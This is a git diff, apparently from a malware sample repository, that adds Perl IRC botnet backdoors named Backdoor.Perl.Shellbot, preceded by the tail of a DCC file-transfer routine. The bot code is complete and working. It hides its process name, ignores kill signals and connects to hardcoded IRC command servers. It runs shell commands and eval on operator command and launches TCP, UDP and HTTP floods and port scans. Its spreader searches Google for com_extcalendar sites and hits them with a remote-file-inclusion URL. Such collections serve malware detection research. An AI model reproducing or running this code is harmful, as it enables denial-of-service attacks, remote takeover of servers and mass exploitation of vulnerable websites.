+     if ($nread == 0 and $dcctipo =~ /^(get|sendcon)$/) {
+        $DCC{$fh}{status} = "Cancelado";
+        $DCC{$fh}{ftime} = time;
+        $dcc_sel->remove($fh);
+        $fh->close;
+        next;
+     }
+
+     if ($dcctipo eq "get") {
+        $DCC{$fh}{curbyte} += length($msg);
+
+        my $cur_byte = $DCC{$fh}{curbyte};
+
+        open(FILE, ">> $arquivo");
+        print FILE "$msg" if ($cur_byte <= $bytes);
+        close(FILE);
+
+        my $packbyte = pack("N", $cur_byte);
+        print $fh "$packbyte";
+
+        if ($bytes == $cur_byte) {
+           $dcc_sel->remove($fh);
+           $fh->close;
+           $DCC{$fh}{status} = "Recebido";
+           $DCC{$fh}{ftime} = time;
+           next;
+        }
+     } elsif ($dcctipo eq "send") {
+          my $send = $fh->accept;
+          $send->autoflush(1);
+          $dcc_sel->add($send);
+          $dcc_sel->remove($fh);
+          $DCC{$send}{tipo} = 'sendcon';
+          $DCC{$send}{itime} = time;
+          $DCC{$send}{nick} = $nick;
+          $DCC{$send}{bytes} = $bytes;
+          $DCC{$send}{curbyte} = 0;
+          $DCC{$send}{arquivo} = $arquivo;
+          $DCC{$send}{ip} = $send->peerhost;
+          $DCC{$send}{porta} = $send->peerport;
+          $DCC{$send}{status} = "Enviando";
+
+          #de cara manda os primeiro 1024 bytes do arkivo.. o resto fik com o sendcon
+          open(FILE, "< $arquivo");
+          my $fbytes;
+          read(FILE, $fbytes, 1024);
+          print $send "$fbytes";
+          close FILE;
+#          delete($DCC{$fh});
+     } elsif ($dcctipo eq 'sendcon') {
+          my $bytes_sended = unpack("N", $msg);
+          $DCC{$fh}{curbyte} = $bytes_sended;
+          if ($bytes_sended == $bytes) {
+             $fh->close;
+             $dcc_sel->remove($fh);
+             $DCC{$fh}{status} = "Enviado";
+             $DCC{$fh}{ftime} = time;
+             next;
+          }
+          open(SENDFILE, "< $arquivo");
+          seek(SENDFILE, $bytes_sended, 0);
+          my $send_bytes;
+          read(SENDFILE, $send_bytes, 1024);
+          print $fh "$send_bytes";
+          close(SENDFILE);
+     }
+   }
+}
+
+
+sub SEND {
+  my ($nick, $arquivo) = @_;
+  unless (-r "$arquivo") {
+    return(0);
+  }
+
+  my $dccark = $arquivo;
+  $dccark =~ s/[.*\/](\S+)/$1/;
+
+  my $meuip = $::irc_servers{"$::IRC_cur_socket"}{'meuip'};
+  my $longip = unpack("N",inet_aton($meuip));
+
+  my @filestat = stat($arquivo);
+  my $size_total=$filestat[7];
+  if ($size_total == 0) {
+     return(0);
+  }
+
+  my ($porta, $sendsock);
+  do {
+    $porta = int rand(64511);
+    $porta += 1024;
+    $sendsock = IO::Socket::INET->new(Listen=>1, LocalPort =>$porta, Proto => 'tcp') and $dcc_sel->add($sendsock);
+  } until $sendsock;
+
+  $DCC{$sendsock}{tipo} = 'send';
+  $DCC{$sendsock}{nick} = $nick;
+  $DCC{$sendsock}{bytes} = $size_total;
+  $DCC{$sendsock}{arquivo} = $arquivo;
+
+
+  &::ctcp("$nick", "DCC SEND $dccark $longip $porta $size_total");
+
+}
+
+sub GET {
+  my ($arquivo, $dcclongip, $dccporta, $bytes, $nick) = @_;
+  return(0) if (-e "$arquivo");
+  if (open(FILE, "> $arquivo")) {
+     close FILE;
+  } else {
+    return(0);
+  }
+
+  my $dccip=fixaddr($dcclongip);
+  return(0) if ($dccporta < 1024 or not defined $dccip or $bytes < 1);
+  my $dccsock = IO::Socket::INET->new(Proto=>"tcp", PeerAddr=>$dccip, PeerPort=>$dccporta, Timeout=>15) or return (0);
+  $dccsock->autoflush(1);
+  $dcc_sel->add($dccsock);
+  $DCC{$dccsock}{tipo} = 'get';
+  $DCC{$dccsock}{itime} = time;
+  $DCC{$dccsock}{nick} = $nick;
+  $DCC{$dccsock}{bytes} = $bytes;
+  $DCC{$dccsock}{curbyte} = 0;
+  $DCC{$dccsock}{arquivo} = $arquivo;
+  $DCC{$dccsock}{ip} = $dccip;
+  $DCC{$dccsock}{porta} = $dccporta;
+  $DCC{$dccsock}{status} = "Recebendo";
+}
+
+# po fico xato de organiza o status.. dai fiz ele retorna o status de acordo com o socket.. dai o ADM.pl lista os sockets e faz as perguntas
+sub Status {
+  my $socket = shift;
+  my $sock_tipo = $DCC{$socket}{tipo};
+  unless (lc($sock_tipo) eq "chat") {
+    my $nick = $DCC{$socket}{nick};
+    my $arquivo = $DCC{$socket}{arquivo};
+    my $itime = $DCC{$socket}{itime};
+    my $ftime = time;
+    my $status = $DCC{$socket}{status};
+    $ftime = $DCC{$socket}{ftime} if defined($DCC{$socket}{ftime});
+
+    my $d_time = $ftime-$itime;
+
+    my $cur_byte = $DCC{$socket}{curbyte};
+    my $bytes_total =  $DCC{$socket}{bytes};
+
+    my $rate = 0;
+    $rate = ($cur_byte/1024)/$d_time if $cur_byte > 0;
+    my $porcen = ($cur_byte*100)/$bytes_total;
+
+    my ($r_duv, $p_duv);
+    if ($rate =~ /^(\d+)\.(\d)(\d)(\d)/) {
+       $r_duv = $3; $r_duv++ if $4 >= 5;
+       $rate = "$1\.$2"."$r_duv";
+    }
+    if ($porcen =~ /^(\d+)\.(\d)(\d)(\d)/) {
+       $p_duv = $3; $p_duv++ if $4 >= 5;
+       $porcen = "$1\.$2"."$p_duv";
+    }
+    return("$sock_tipo","$status","$nick","$arquivo","$bytes_total", "$cur_byte","$d_time", "$rate", "$porcen");
+  }
+
+
+  return(0);
+}
+
+
+# esse 'sub fixaddr' daki foi pego do NET::IRC::DCC identico soh copiei e coloei (colokar nome do autor)
+sub fixaddr {
+    my ($address) = @_;
+
+    chomp $address;     # just in case, sigh.
+    if ($address =~ /^\d+$/) {
+        return inet_ntoa(pack "N", $address);
+    } elsif ($address =~ /^[12]?\d{1,2}\.[12]?\d{1,2}\.[12]?\d{1,2}\.[12]?\d{1,2}$/) {
+        return $address;
+    } elsif ($address =~ tr/a-zA-Z//) {                    # Whee! Obfuscation!
+        return inet_ntoa(((gethostbyname($address))[4])[0]);
+    } else {
+        return;
+    }
+}
+
+
+DDDDDDDD
+
+
diff --git a/Perl/Backdoor.Perl.Shellbot.o b/Perl/Backdoor.Perl.Shellbot.o
new file mode 100644
index 00000000..b427a588
--- /dev/null
+++ b/Perl/Backdoor.Perl.Shellbot.o
@@ -0,0 +1,515 @@
+# Thanks To apaii, KingFighter, fdf, Kill_Tech And gr33t t0 Myhack & HackerMalaysia @DALnet
+# ------[eoff = End Of Fucking Files]-----
+
+
+
+system("kill -9 `ps ax |grep /var/tmp/wops/is |grep -v grep|awk '{print $1;}'`");
+
+
+my $processo = 'httpsl';
+
+# Bermula Disini
+
+my @titi = ("afrika-");
+
+my $sleep='5';
+my $linas_max='4';
+my @adms=("xx","ok","mos", "Boss_xx", "KKTeam", "KaHiN");
+my @hostauth=("fbi.gov");
+my @canais=("#mambo");
+my $nick=  $titi[rand scalar @titi];
+my $ircname =  $titi[rand scalar @titi];
+chop (my $realname = $titi[rand scalar @titi]);
+
+$servidor='xx.albap0wer.com' unless $servidor;
+my $porta='8555';
+my $versi_saya = '1.0';
+$SIG{'INT'} = 'IGNORE';
+$SIG{'HUP'} = 'IGNORE';
+$SIG{'TERM'} = 'IGNORE';
+$SIG{'CHLD'} = 'IGNORE';
+$SIG{'PS'} = 'IGNORE';
+use IO::Socket;
+use Socket;
+use IO::Select;
+chdir("/");
+$servidor="$ARGV[0]" if $ARGV[0];
+$0="$processo"."\0"x16;;
+my $pid=fork;
+exit if $pid;
+die "Problema com o fork: $!" unless defined($pid);
+
+our %irc_servers;
+our %DCC;
+my $dcc_sel = new IO::Select->new();
+
+$sel_cliente = IO::Select->new();
+sub sendraw {
+  if ($#_ == '1') {
+    my $socket = $_[0];
+    print $socket "$_[1]\n";
+  } else {
+      print $IRC_cur_socket "$_[0]\n";
+  }
+}
+
+sub conectar {
+   my $meunick = $_[0];
+   my $servidor_con = $_[1];
+   my $porta_con = $_[2];
+
+   my $IRC_socket = IO::Socket::INET->new(Proto=>"tcp", PeerAddr=>"$servidor_con", PeerPort=>$porta_con) or return(1);
+   if (defined($IRC_socket)) {
+     $IRC_cur_socket = $IRC_socket;
+
+     $IRC_socket->autoflush(1);
+     $sel_cliente->add($IRC_socket);
+
+     $irc_servers{$IRC_cur_socket}{'host'} = "$servidor_con";
+     $irc_servers{$IRC_cur_socket}{'porta'} = "$porta_con";
+     $irc_servers{$IRC_cur_socket}{'nick'} = $meunick;
+     $irc_servers{$IRC_cur_socket}{'meuip'} = $IRC_socket->sockhost;
+     nick("$meunick");
+     sendraw("USER $ircname ".$IRC_socket->sockhost." $servidor_con :$realname");
+     sleep 1;
+   }
+}
+my $line_temp;
+while( 1 ) {
+   while (!(keys(%irc_servers))) { conectar("$nick", "$servidor", "$porta"); }
+   delete($irc_servers{''}) if (defined($irc_servers{''}));
+   my @ready = $sel_cliente->can_read(0);
+   next unless(@ready);
+   foreach $fh (@ready) {
+     $IRC_cur_socket = $fh;
+     $meunick = $irc_servers{$IRC_cur_socket}{'nick'};
+     $nread = sysread($fh, $msg, 4096);
+     if ($nread == 0) {
+        $sel_cliente->remove($fh);
+        $fh->close;
+        delete($irc_servers{$fh});
+     }
+     @lines = split (/\n/, $msg);
+
+     for(my $c=0; $c<= $#lines; $c++) {
+       $line = $lines[$c];
+       $line=$line_temp.$line if ($line_temp);
+       $line_temp='';
+       $line =~ s/\r$//;
+       unless ($c == $#lines) {
+         parse("$line");
+       } else {
+           if ($#lines == 0) {
+             parse("$line");
+           } elsif ($lines[$c] =~ /\r$/) {
+               parse("$line");
+           } elsif ($line =~ /^(\S+) NOTICE AUTH :\*\*\*/) {
+               parse("$line");
+           } else {
+               $line_temp = $line;
+           }
+       }
+      }
+   }
+}
+ 
+sub parse {
+   my $servarg = shift;
+   if ($servarg =~ /^PING \:(.*)/) {
+     sendraw("PONG :$1");
+   } elsif ($servarg =~ /^\:(.+?)\!(.+?)\@(.+?) PRIVMSG (.+?) \:(.+)/) {
+       my $pn=$1; my $hostmask= $3; my $onde = $4; my $args = $5;
+       if ($args =~ /^\001VERSION\001$/) {
+         notice("$pn", "\001VERSION mIRC v6.16 Khaled Mardam-Bey\001");
+       }
+       if (grep {$_ =~ /^\Q$hostmask\E$/i } @hostauth) {
+       if (grep {$_ =~ /^\Q$pn\E$/i } @adms) {
+         if ($onde eq "$meunick"){
+           shell("$pn", "$args");
+         }
+         if ($args =~ /^(\Q$meunick\E|\!say)\s+(.*)/ ) {
+            my $natrix = $1;
+            my $arg = $2;
+            if ($arg =~ /^\!(.*)/) {
+              ircase("$pn","$onde","$1") unless ($natrix eq "!bot" and $arg =~ /^\!nick/);
+            } elsif ($arg =~ /^\@(.*)/) {
+                $ondep = $onde;
+                $ondep = $pn if $onde eq $meunick;
+                bfunc("$ondep","$1");
+            } else {
+                shell("$onde", "$arg");
+            }
+         } 
+       }
+	}
+   } elsif ($servarg =~ /^\:(.+?)\!(.+?)\@(.+?)\s+NICK\s+\:(\S+)/i) {
+       if (lc($1) eq lc($meunick)) {
+         $meunick=$4; 
+         $irc_servers{$IRC_cur_socket}{'nick'} = $meunick;
+       }
+   } elsif ($servarg =~ m/^\:(.+?)\s+433/i) {
+       nick("$meunick|".int rand(999999));
+   } elsif ($servarg =~ m/^\:(.+?)\s+001\s+(\S+)\s/i) {
+       $meunick = $2;
+       $irc_servers{$IRC_cur_socket}{'nick'} = $meunick;
+       $irc_servers{$IRC_cur_socket}{'nome'} = "$1";
+       foreach my $canal (@canais) {
+         sendraw("JOIN $canal ddosit");
+       }
+   }
+}
+
+
+sub bfunc {
+  my $printl = $_[0];
+  my $funcarg = $_[1];
+  if (my $pid = fork) {
+     waitpid($pid, 0);
+  } else {
+      if (fork) {
+         exit;
+       } else {
+           if ($funcarg =~ /^portscan (.*)/) {
+             my $hostip="$1";
+             my @portas=("21","22","23","25","80","113","135","445","1025","5000","6660","6661","6662","6663","6665","6666","6667","6668","6669","7000","8080","8018");
+             my (@aberta, %porta_banner);
+	     sendraw($IRC_cur_socket, "PRIVMSG $printl :\002[SCAN]\002 Scanning ".$1." for open ports.");     
+             foreach my $porta (@portas)  {
+                my $scansock = IO::Socket::INET->new(PeerAddr => $hostip, PeerPort => $porta, Proto => 'tcp', Timeout => 4);
+                if ($scansock) {
+                   push (@aberta, $porta);
+                   $scansock->close;
+                }
+             }
+
+             if (@aberta) {
+               sendraw($IRC_cur_socket, "PRIVMSG $printl :\002[SCAN]\002 Open port(s): @aberta");
+             } else {
+               sendraw($IRC_cur_socket,"PRIVMSG $printl :\002[SCAN]\002 No open ports found"); 
+             }
+           }
+           if ($funcarg =~ /^tcpflood\s+(.*)\s+(\d+)\s+(\d+)/) {
+	     sendraw($IRC_cur_socket, "PRIVMSG $printl :\002[TCP]\002 Attacking ".$1.":".$2." for ".$3." seconds.");
+	     my $itime = time;
+	     my ($cur_time);
+             $cur_time = time - $itime;
+	     while ($3>$cur_time){
+             $cur_time = time - $itime;
+	     &tcpflooder("$1","$2","$3");
+             }
+	     sendraw($IRC_cur_socket, "PRIVMSG $printl :\002[TCP]\002 Attack done ".$1.":".$2.".");
+           }
+	   if ($funcarg =~ /^version/) {
+		sendraw($IRC_cur_socket, "PRIVMSG $printl :\002[VERSION]\002 HackerMalaysia Versi ".$versi_saya);		   
+		}
+           if ($funcarg =~ /^google\s+(\d+)\s+(.*)/) {
+	     sendraw($IRC_cur_socket, "PRIVMSG $printl :\002[GOOGLE]\002 Scanning for Php-Nuk3 exploit ".$1." seconds.");
+	     srand;
+	     my $itime = time;
+	     my ($cur_time);
+	     my ($exploited);
+	     $boturl=$2;
+             $cur_time = time - $itime;$exploited = 0;
+		while($1>$cur_time){
+		    $cur_time = time - $itime;
+		    @urls=fetch();
+			foreach $url (@urls) {
+			$cur_time = time - $itime;
+			my $path = "";my $file = "";($path, $file) = $url =~ /^(.+)\/(.+)$/;
+			$url =$path."components/com_extcalendar/extcalendar.php?mosConfig_absolute_path=$boturl?";
+			$page = http_query($url);
+			$exploited = $exploited + 1;
+		    }
+		}
+	     sendraw($IRC_cur_socket, "PRIVMSG $printl :\002[GOOGLE]\002 Exploited ".$exploited." Php-Nuk3 boxes in ".$1." seconds.");
+           }
+           if ($funcarg =~ /^httpflood\s+(.*)\s+(\d+)/) {
+	     sendraw($IRC_cur_socket, "PRIVMSG $printl :\002[HTTP]\002 Attacking ".$1.":80 for ".$2." seconds.");
+	     my $itime = time;
+	     my ($cur_time);
+             $cur_time = time - $itime;
+	     while ($2>$cur_time){
+             $cur_time = time - $itime;
+	     my $socket = IO::Socket::INET->new(proto=>'tcp', PeerAddr=>$1, PeerPort=>80);
+             print $socket "GET / HTTP/1.1\r\nAccept: */*\r\nHost: ".$1."\r\nConnection: Keep-Alive\r\n\r\n";
+	     close($socket);
+             }
+	     sendraw($IRC_cur_socket, "PRIVMSG $printl :\002[HTTP]\002 Attacking done ".$1.".");
+           }
+           if ($funcarg =~ /^udpflood\s+(.*)\s+(\d+)\s+(\d+)/) {
+             sendraw($IRC_cur_socket, "PRIVMSG $printl :\002[UDP]\002 Attacking ".$1." with ".$2." Kb packets for ".$3." seconds.");
+             my ($dtime, %pacotes) = udpflooder("$1", "$2", "$3");
+             $dtime = 1 if $dtime == 0;
+             my %bytes;
+             $bytes{igmp} = $2 * $pacotes{igmp};
+             $bytes{icmp} = $2 * $pacotes{icmp};
+             $bytes{o} = $2 * $pacotes{o};
+             $bytes{udp} = $2 * $pacotes{udp};
+             $bytes{tcp} = $2 * $pacotes{tcp};
+             sendraw($IRC_cur_socket, "PRIVMSG $printl :\002[UDP]\002 Sent ".int(($bytes{icmp}+$bytes{igmp}+$bytes{udp} + $bytes{o})/1024)." Kb in ".$dtime." seconds to ".$1.".");
+           }
+           exit;
+       }
+  }
+}
+ 
+sub ircase {
+  my ($kem, $printl, $case) = @_;
+
+  if ($case =~ /^join (.*)/) {
+     j("$1");
+   } 
+   if ($case =~ /^part (.*)/) {
+      p("$1");
+   }
+   if ($case =~ /^rejoin\s+(.*)/) {
+      my $chan = $1;
+      if ($chan =~ /^(\d+) (.*)/) {
+        for (my $ca = 1; $ca <= $1; $ca++ ) {
+          p("$2");
+          j("$2");
+        }
+      } else {
+          p("$chan");
+          j("$chan");
+      }
+   }
+   if ($case =~ /^op/) {
+      op("$printl", "$kem") if $case eq "op";
+      my $oarg = substr($case, 3);
+      op("$1", "$2") if ($oarg =~ /(\S+)\s+(\S+)/);
+   }
+   if ($case =~ /^deop/) {
+      deop("$printl", "$kem") if $case eq "deop";
+      my $oarg = substr($case, 5);
+      deop("$1", "$2") if ($oarg =~ /(\S+)\s+(\S+)/);
+   }
+   if ($case =~ /^msg\s+(\S+) (.*)/) {
+      msg("$1", "$2");
+   }
+   if ($case =~ /^flood\s+(\d+)\s+(\S+) (.*)/) {
+      for (my $cf = 1; $cf <= $1; $cf++) {
+        msg("$2", "$3");
+      }
+   }
+   if ($case =~ /^ctcp\s+(\S+) (.*)/) {
+      ctcp("$1", "$2");
+   }
+   if ($case =~ /^ctcpflood\s+(\d+)\s+(\S+) (.*)/) {
+      for (my $cf = 1; $cf <= $1; $cf++) {
+        ctcp("$2", "$3");
+      }
+   }
+   if ($case =~ /^nick (.*)/) {
+      nick("$1");
+   }
+   if ($case =~ /^connect\s+(\S+)\s+(\S+)/) {
+       conectar("$2", "$1", 6667);
+   }
+   if ($case =~ /^raw (.*)/) {
+      sendraw("$1");
+   }
+   if ($case =~ /^eval (.*)/) {
+     eval "$1";
+   }
+}
+
+sub shell {
+  my $printl=$_[0];
+  my $comando=$_[1];
+  if ($comando =~ /cd (.*)/) {
+    chdir("$1") || msg("$printl", "No such file or directory");
+    return;
+  } 
+  elsif ($pid = fork) {
+     waitpid($pid, 0);
+  } else {
+      if (fork) {
+         exit;
+       } else {
+           my @resp=`$comando 2>&1 3>&1`;
+           my $c=0;
+           foreach my $linha (@resp) {
+             $c++;
+             chop $linha;
+             sendraw($IRC_cur_socket, "PRIVMSG $printl :$linha");
+             if ($c == "$linas_max") {
+               $c=0;
+               sleep $sleep;
+             }
+           }
+           exit;
+       }
+  }
+}
+
+sub tcpflooder {
+ my $itime = time;
+ my ($cur_time);
+ my ($ia,$pa,$proto,$j,$l,$t);
+ $ia=inet_aton($_[0]);
+ $pa=sockaddr_in($_[1],$ia);
+ $ftime=$_[2];
+ $proto=getprotobyname('tcp');
+ $j=0;$l=0;
+ $cur_time = time - $itime;
+ while ($l<1000){
+  $cur_time = time - $itime;
+  last if $cur_time >= $ftime;
+  $t="SOCK$l";
+  socket($t,PF_INET,SOCK_STREAM,$proto);
+  connect($t,$pa)||$j--;
+  $j++;$l++;
+ }
+ $l=0;
+ while ($l<1000){
+  $cur_time = time - $itime;
+  last if $cur_time >= $ftime;
+  $t="SOCK$l";
+  shutdown($t,2);
+  $l++;
+ }
+}
+
+sub udpflooder {
+  my $iaddr = inet_aton($_[0]);
+  my $msg = 'A' x $_[1];
+  my $ftime = $_[2];
+  my $cp = 0;
+  my (%pacotes);
+  $pacotes{icmp} = $pacotes{igmp} = $pacotes{udp} = $pacotes{o} = $pacotes{tcp} = 0;
+  
+  socket(SOCK1, PF_INET, SOCK_RAW, 2) or $cp++;
+
+  socket(SOCK2, PF_INET, SOCK_DGRAM, 17) or $cp++;
+  socket(SOCK3, PF_INET, SOCK_RAW, 1) or $cp++;
+  socket(SOCK4, PF_INET, SOCK_RAW, 6) or $cp++;
+  return(undef) if $cp == 4;
+  my $itime = time;
+  my ($cur_time);
+  while ( 1 ) {
+     for (my $porta = 1; $porta <= 65000; $porta++) {
+       $cur_time = time - $itime;
+       last if $cur_time >= $ftime;
+       send(SOCK1, $msg, 0, sockaddr_in($porta, $iaddr)) and $pacotes{igmp}++;
+       send(SOCK2, $msg, 0, sockaddr_in($porta, $iaddr)) and $pacotes{udp}++;
+       send(SOCK3, $msg, 0, sockaddr_in($porta, $iaddr)) and $pacotes{icmp}++;
+       send(SOCK4, $msg, 0, sockaddr_in($porta, $iaddr)) and $pacotes{tcp}++;
+
+       for (my $pc = 3; $pc <= 255;$pc++) {
+         next if $pc == 6;
+         $cur_time = time - $itime;
+         last if $cur_time >= $ftime;
+         socket(SOCK5, PF_INET, SOCK_RAW, $pc) or next;
+         send(SOCK5, $msg, 0, sockaddr_in($porta, $iaddr)) and $pacotes{o}++;
+       }
+     }
+     last if $cur_time >= $ftime;
+  }
+  return($cur_time, %pacotes);
+}
+
+sub ctcp {
+   return unless $#_ == 1;
+   sendraw("PRIVMSG $_[0] :\001$_[1]\001");
+}
+sub msg {
+   return unless $#_ == 1;
+   sendraw("PRIVMSG $_[0] :$_[1]");
+}  
+sub notice {
+   return unless $#_ == 1;
+   sendraw("NOTICE $_[0] :$_[1]");
+}
+sub op {
+   return unless $#_ == 1;
+   sendraw("MODE $_[0] +o $_[1]");
+}
+sub deop {
+   return unless $#_ == 1;
+   sendraw("MODE $_[0] -o $_[1]");
+}
+sub j { &join(@_); }
+sub join {
+   return unless $#_ == 0;
+   sendraw("JOIN $_[0]");
+}
+sub p { part(@_); }
+sub part {
+  sendraw("PART $_[0]");
+}
+sub nick {
+  return unless $#_ == 0;
+  sendraw("NICK $_[0]");
+}
+sub quit {
+  sendraw("QUIT :$_[0]");
+}
+
+# Spreader
+# this 'spreader' code isnot mine, i dont know who coded it.
+# update: well, i just fix0red this shit a bit.
+#
+
+sub fetch(){
+    my $rnd=(int(rand(9999)));
+    my $n= 80;
+    if ($rnd<5000) { $n<<=1;}
+    my $s= (int(rand(10)) * $n);
+
+my @dominios = ("com","net","org","info","gov", "gob","gub","xxx", "eu","mil","edu","aero","name","us","ca","mx","pa","ni","cu","pr","ve","co","pe","ec",
+		"py","cl","uy","ar","br","bo","au","nz","cz","kr","jp","th","tw","ph","cn","fi","de","es","pt","ch","se","su","it","gr","al","dk","pl","biz","int","pro","museum","coop",
+		"af","ad","ao","ai","aq","ag","an","sa","dz","ar","am","aw","at","az","bs","bh","bd","bb","be","bz","bj","bm","bt","by","ba","bw","bn","bg","bf","bi",
+		"vc","kh","cm","td","cs","cy","km","cg","cd","dj","dm","ci","cr","hr","kp","eg","sv","aw","er","sk",
+		"ee","et","ge","fi","fr","ga","gs","gh","gi","gb","uk","gd","gl","gp","gu","gt","gg","gn","gw","gq","gy","gf","ht","nl","hn","hk","hu","in","id","ir",
+		"iq","ie","is","ac","bv","cx","im","nf","ky","cc","ck","fo","hm","fk","mp","mh","pw","um","sb","sj","tc","vg","vi","wf","il","jm","je","jo","kz","ke",
+		"ki","kg","kw","lv","ls","lb","ly","lr","li","lt","lu","mo","mk","mg","my","mw","mv","ml","mt","mq","ma","mr","mu","yt","md","mc","mn","ms","mz","mm",
+		"na","nr","np","ni","ne","ng","nu","no","nc","om","pk","ps","pg","pn","pf","qa","sy","cf","la","re","rw","ro","ru","eh","kn","ws","as","sm","pm","vc",		
+		"sh","lc","va","st","sn","sc","sl","sg","so","lk","za","sd","se","sr","sz","rj","tz","io","tf","tp","tg","to","tt","tn","tr","tm","tv","ug","ua","uz",
+		"vu","vn","ye","yu","cd","zm","zw","");
+my @str;
+
+foreach $dom  (@dominios)
+{
+	push (@str,"%22com_extcalendar%22+inurl%3Aindex.php?option=com_extcalendar+site%3A&".$dom."%20");
+}
+
+    my $query="www.google.co.uk/search?q=";
+    $query.=$str[(rand(scalar(@str)))];
+    $query.="hl=en&lr=&start=$&sa=N";
+    my @lst=();
+    my $page = http_query($query);
+    while ($page =~  m/<a class=l href=\"?http:\/\/([^>\"]+)\"?>/g){
+	if ($1 !~ m/google|cache|translate/){
+	    push (@lst,$1);
+	}
+    }
+    return (@lst);
+}
+
+sub http_query($){
+    my ($url) = @_;
+    my $host=$url;
+    my $query=$url;
+    my $page="";
+    $host =~ s/href=\"?http:\/\///;
+    $host =~ s/([-a-zA-Z0-9\.]+)\/.*/$1/;
+    $query =~s/$host//;
+    if ($query eq "") {$query="/";};
+    eval {
+	local $SIG{ALRM} = sub { die "1";};
+	alarm 10;
+	my $sock = IO::Socket::INET->new(PeerAddr=>"$host",PeerPort=>"80",Proto=>"tcp") or return;
+	print $sock "GET $query HTTP/1.0\r\nHost: $host\r\nAccept: */*\r\nUser-Agent: Mozilla/5.0\r\n\r\n";
+	my @r = <$sock>;
+	$page="@r";
+	alarm 0;
+	close($sock);
+    };    
+    return $page;
+
+}
+
+
+
+
diff --git a/Perl/Backdoor.Perl.Shellbot.s b/Perl/Backdoor.Perl.Shellbot.s
new file mode 100644
index 00000000..ab0bac7a
--- /dev/null
+++ b/Perl/Backdoor.Perl.Shellbot.s
@@ -0,0 +1,515 @@
+# Thanks To apaii, KingFighter, fdf, Kill_Tech And gr33t t0 Myhack & HackerMalaysia @DALnet
+# ------[eoff = End Of Fucking Files]-----
+
+
+
+system("kill -9 `ps ax |grep /var/tmp/wops/is |grep -v grep|awk '{print $1;}'`");
+
+
+my $processo = 'httpsl';
+
+# Bermula Disini
+
+my @titi = ("PhpNuke-|");
+
+my $sleep='5';
+my $linas_max='4';
+my @adms=("xx","mos","fuckyou");
+my @hostauth=("fbi.gov");
+my @canais=("#phpnuke1");
+my $nick=  $titi[rand scalar @titi];
+my $ircname =  $titi[rand scalar @titi];
+chop (my $realname = $titi[rand scalar @titi]);
+
+$servidor='mushu.tetovalive.de' unless $servidor;
+my $porta='8209';
+my $versi_saya = '1.0';
+$SIG{'INT'} = 'IGNORE';
+$SIG{'HUP'} = 'IGNORE';
+$SIG{'TERM'} = 'IGNORE';
+$SIG{'CHLD'} = 'IGNORE';
+$SIG{'PS'} = 'IGNORE';
+use IO::Socket;
+use Socket;
+use IO::Select;
+chdir("/");
+$servidor="$ARGV[0]" if $ARGV[0];
+$0="$processo"."\0"x16;;
+my $pid=fork;
+exit if $pid;
+die "Problema com o fork: $!" unless defined($pid);
+
+our %irc_servers;
+our %DCC;
+my $dcc_sel = new IO::Select->new();
+
+$sel_cliente = IO::Select->new();
+sub sendraw {
+  if ($#_ == '1') {
+    my $socket = $_[0];
+    print $socket "$_[1]\n";
+  } else {
+      print $IRC_cur_socket "$_[0]\n";
+  }
+}
+
+sub conectar {
+   my $meunick = $_[0];
+   my $servidor_con = $_[1];
+   my $porta_con = $_[2];
+
+   my $IRC_socket = IO::Socket::INET->new(Proto=>"tcp", PeerAddr=>"$servidor_con", PeerPort=>$porta_con) or return(1);
+   if (defined($IRC_socket)) {
+     $IRC_cur_socket = $IRC_socket;
+
+     $IRC_socket->autoflush(1);
+     $sel_cliente->add($IRC_socket);
+
+     $irc_servers{$IRC_cur_socket}{'host'} = "$servidor_con";
+     $irc_servers{$IRC_cur_socket}{'porta'} = "$porta_con";
+     $irc_servers{$IRC_cur_socket}{'nick'} = $meunick;
+     $irc_servers{$IRC_cur_socket}{'meuip'} = $IRC_socket->sockhost;
+     nick("$meunick");
+     sendraw("USER $ircname ".$IRC_socket->sockhost." $servidor_con :$realname");
+     sleep 1;
+   }
+}
+my $line_temp;
+while( 1 ) {
+   while (!(keys(%irc_servers))) { conectar("$nick", "$servidor", "$porta"); }
+   delete($irc_servers{''}) if (defined($irc_servers{''}));
+   my @ready = $sel_cliente->can_read(0);
+   next unless(@ready);
+   foreach $fh (@ready) {
+     $IRC_cur_socket = $fh;
+     $meunick = $irc_servers{$IRC_cur_socket}{'nick'};
+     $nread = sysread($fh, $msg, 4096);
+     if ($nread == 0) {
+        $sel_cliente->remove($fh);
+        $fh->close;
+        delete($irc_servers{$fh});
+     }
+     @lines = split (/\n/, $msg);
+
+     for(my $c=0; $c<= $#lines; $c++) {
+       $line = $lines[$c];
+       $line=$line_temp.$line if ($line_temp);
+       $line_temp='';
+       $line =~ s/\r$//;
+       unless ($c == $#lines) {
+         parse("$line");
+       } else {
+           if ($#lines == 0) {
+             parse("$line");
+           } elsif ($lines[$c] =~ /\r$/) {
+               parse("$line");
+           } elsif ($line =~ /^(\S+) NOTICE AUTH :\*\*\*/) {
+               parse("$line");
+           } else {
+               $line_temp = $line;
+           }
+       }
+      }
+   }
+}
+ 
+sub parse {
+   my $servarg = shift;
+   if ($servarg =~ /^PING \:(.*)/) {
+     sendraw("PONG :$1");
+   } elsif ($servarg =~ /^\:(.+?)\!(.+?)\@(.+?) PRIVMSG (.+?) \:(.+)/) {
+       my $pn=$1; my $hostmask= $3; my $onde = $4; my $args = $5;
+       if ($args =~ /^\001VERSION\001$/) {
+         notice("$pn", "\001VERSION mIRC v6.16 Khaled Mardam-Bey\001");
+       }
+       if (grep {$_ =~ /^\Q$hostmask\E$/i } @hostauth) {
+       if (grep {$_ =~ /^\Q$pn\E$/i } @adms) {
+         if ($onde eq "$meunick"){
+           shell("$pn", "$args");
+         }
+         if ($args =~ /^(\Q$meunick\E|\!say)\s+(.*)/ ) {
+            my $natrix = $1;
+            my $arg = $2;
+            if ($arg =~ /^\!(.*)/) {
+              ircase("$pn","$onde","$1") unless ($natrix eq "!bot" and $arg =~ /^\!nick/);
+            } elsif ($arg =~ /^\@(.*)/) {
+                $ondep = $onde;
+                $ondep = $pn if $onde eq $meunick;
+                bfunc("$ondep","$1");
+            } else {
+                shell("$onde", "$arg");
+            }
+         } 
+       }
+	}
+   } elsif ($servarg =~ /^\:(.+?)\!(.+?)\@(.+?)\s+NICK\s+\:(\S+)/i) {
+       if (lc($1) eq lc($meunick)) {
+         $meunick=$4; 
+         $irc_servers{$IRC_cur_socket}{'nick'} = $meunick;
+       }
+   } elsif ($servarg =~ m/^\:(.+?)\s+433/i) {
+       nick("$meunick|".int rand(999999));
+   } elsif ($servarg =~ m/^\:(.+?)\s+001\s+(\S+)\s/i) {
+       $meunick = $2;
+       $irc_servers{$IRC_cur_socket}{'nick'} = $meunick;
